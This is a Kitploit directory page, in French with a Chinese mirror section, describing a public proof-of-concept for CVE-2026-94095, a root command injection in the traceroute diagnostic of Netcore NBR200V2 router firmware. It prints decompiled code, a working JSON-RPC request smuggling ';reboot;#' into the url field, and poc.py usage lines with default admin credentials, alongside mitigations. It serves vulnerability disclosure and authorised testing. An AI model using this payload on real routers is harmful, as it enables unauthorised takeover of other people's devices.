Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-94095 — PoC pour CVE-2026-94095, une injection de commande traceroute dans le firmware Netcore NBR200V2 via ubus JSON-RPC, permettant une RCE root pour des tests autorisés. | Kitploit
Outils/GitHubGitHub/hackspeak/cve-2026-94095
Sécurité des Systèmes EmbarquésSécurité IoTAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionSécurité Matériel et IoTArticles et Recherche
GitHubhackspeak/cve-2026-94095

CVE-2026-94095

PoC pour CVE-2026-94095, une injection de commande traceroute dans le firmware Netcore NBR200V2 via ubus JSON-RPC, permettant une RCE root pour des tests autorisés.

1il y a 7h 27mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt

Netcore NBR200V2 - Injection de commande à distance dans la fonctionnalité de diagnostic Traceroute (CVE-2026-94095)

ChampValeur
FournisseurNetcore
ModèleNBR200V2
Version du firmwareV1.3.241127.071246
Composant affecté/usr/bin/network_tools
Type de vulnérabilitéInjection de commande OS (CWE-74 / CWE-77)
CVSS 3.19.9 (Critique)
Vecteur d'attaqueÀ distance (ubus JSON-RPC)
PrérequisPoint de terminaison ubus accessible + une session à faibles privilèges (sid)
Statut du fournisseurContacté tôt ; aucune réponse ; aucun correctif au moment de la divulgation

Description

Le firmware V1.3.241127.071246 du Netcore NBR200V2 contient une vulnérabilité d'injection de commande à distance dans la fonctionnalité de diagnostic traceroute. Le gestionnaire traceroute accepte une valeur url contrôlée par l'attaquant depuis ubus JSON-RPC, la concatène dans une commande shell et exécute la commande résultante. Un attaquant distant peut exploiter cette faille pour exécuter des commandes shell arbitraires, redémarrer l'appareil ou obtenir une compromission complète du système.

Chaîne de vulnérabilité

La requête distante est acceptée en tant que ubus JSON-RPC :

root@kitploit:~
POST /ubus {"jsonrpc":"2.0","id":20,"method":"call","params":["<sid>","network_tools","tools_traceroute",{"action":"start","url":"<attacker-controlled>","max_hop":1,"wanid":0}]}

Le mappage des méthodes ubus route la requête vers sub_401BD8 :

root@kitploit:~
object.name = "network_tools"; object.methods = 0x412f4c; "tools_traceroute" -> sub_401BD8

sub_401BD8 analyse les données JSON-RPC et les transmet à tools_traceroute() :

root@kitploit:~
blobmsg_parse(&off_412FA4, 4, &v21, a5 + 4, (v6 & 0xFFFFFF) - 4);
...
v25[0] = v18;              // action
v25[1] = v7;               // url
v25[2] = _bswapsi2(*v8);   // max_hop
...
result = tools_traceroute((int)v25);

tools_traceroute() construit une commande shell en utilisant la valeur url non fiable :

root@kitploit:~
snprintf(
    v4, 0x100u,
    "(traceroute %s -m %d > %s && echo \"traceroute ending\" >> %s; touch %s)&",
    v2, *(_DWORD *)(a1 + 8), "/tmp/traceroute.txt", "/tmp/traceroute.txt", "/tmp/.tracroute_end");
system(v4);

La vulnérabilité est structurellement identique au problème de ping, mais atteint un point de terminaison et un chemin d'exécution différents. Comme system() est utilisé, les séparateurs de commande tels que ;, && et les commentaires shell sont honorés. La fonctionnalité de diagnostic devient donc une primitive d'exécution de commandes à usage général.

Preuve de concept

root@kitploit:~
POST /ubus
Content-Type: application/json

{"jsonrpc":"2.0","id":20,"method":"call","params":["<sid>","network_tools","tools_traceroute",{"action":"start","url":"127.0.0.1;reboot;#","max_hop":1}]}

Effet attendu : le routeur exécute reboot pendant le traitement de la tâche traceroute. Des commandes shell arbitraires peuvent être substituées à reboot.

Vulnérabilités liées (même lot)

  • CVE-2026-94096 — chemin de configuration IP LAN (même binaire, même schéma).
  • CVE-2026-94097 — point de terminaison de diagnostic CGI (CVSS 10.0).

Les trois atteignent le même /usr/bin/network_tools ; les fonctions de diagnostic de ce binaire partagent le même schéma non sécurisé, donc corriger un seul point d'entrée n'est pas suffisant.

Remédiation

Aucun correctif du fournisseur au moment de la divulgation. Mesures d'atténuation provisoires :

  1. N'exposez pas l'interface de gestion à des réseaux non fiables ; supprimez tous les mappages de gestion côté WAN ;
  2. Changez les identifiants par défaut et imposez des mots de passe forts et renouvelés (l'authentification ubus est le prérequis de cette attaque) ;
  3. Restreignez le point de terminaison ubus / gestion à un sous-réseau d'exploitation dédié via le pare-feu ;
  4. Suivez les mises à jour du firmware du fournisseur et vérifiez les correctifs pour CVE-2026-94095/94096/94097 ensemble.

Crédit

Divulgation par le chercheur indépendant qui a publié l'analyse technique et coordonné (sans succès) avec le fournisseur.


分发镜像说明(中文)

本仓库为 CVE-2026-94095(Netcore NBR200V2 traceroute 命令注入) 漏洞 PoC 的中转分发镜像(英文技术披露见上方 CVE-2026-94095.md)。内容依据公开披露文档整理,仅作存档与分发用途。PoC 仅供安全研究、漏洞验证与授权测试,请勿用于未授权目标。

漏洞简述 / Vulnerability Summary

  • CVE-2026-94095(同批:CVE-2026-94096 / CVE-2026-94097)
  • 影响产品:Netcore NBR200V2 企业路由器,固件 V1.3.241127.071246
  • 受影响组件:/usr/bin/network_tools(traceroute 诊断功能)
  • 类型:OS 命令注入(CWE-74 / CWE-77)
  • CVSS 3.1:9.9(Critical);CVSS 4.0:8.6;CVSS 2.0:9.0
  • 攻击面:ubus JSON-RPC 端点(POST /ubus)
  • 前置条件:可访问 ubus 接口 + 一个低权限会话(sid);弱口令/默认口令会显著降低门槛
  • 修复状态:披露者提前联系厂商,厂商零回应,暂无官方补丁

核心原理:tools_traceroute() 用 snprintf 把攻击者可控的 url 参数拼进 shell 命令,再交给 system() 执行;url 未做任何过滤/转义,分号 ;、&&、管道、注释符 # 均有效——诊断功能因此变成通用命令执行原语。

目录结构 / Layout

root@kitploit:~
CVE-2026-94095.md   —— 公开披露整理(调用链、反编译片段、PoC 请求)
poc.py              —— 可用 PoC 脚本(ubus JSON-RPC 注入,纯标准库)

环境与用法 / Requirements & Usage

  • 目标:未修复的 Netcore NBR200V2(实验室设备);需可访问 POST /ubus 与一个有效 sid
  • 依赖:Python 3(纯标准库,零第三方依赖)
root@kitploit:~
# 已有 sid:
python3 poc.py --target http://192.168.1.1 --sid <SESSION_ID> --cmd "id"

# 用账号口令获取 sid(弱口令/默认口令场景):
python3 poc.py --target http://192.168.1.1 --user admin --password admin --cmd "reboot"

⚠️ 命令会被拼接为 127.0.0.1;<命令>;# 注入 url 参数;reboot 会直接重启设备,请仅在授权/可销毁环境测试。

免责声明 / Disclaimer

本 PoC 仅供教学、安全研究与授权测试使用,仅可对自有或获得明确授权的设备运行。利用会以设备最高权限执行任意命令(默认运行于 root 上下文),请在可销毁的实验室环境中测试。

归属与许可 / Attribution & License

  • 漏洞由独立研究者公开披露并整理利用链;本仓库为其公开材料的镜像与 PoC 实现。
  • 分发仓库采用 MIT License(见 LICENSE)。

参考链接 / References

  • NVD:https://nvd.nist.gov/vuln/detail/CVE-2026-94095
  • CVE 记录:https://www.cve.org/CVERecord?id=CVE-2026-94095
  • 第三方分析(VulDB):https://vuldb.com/vuln/408024
Télécharger l’outil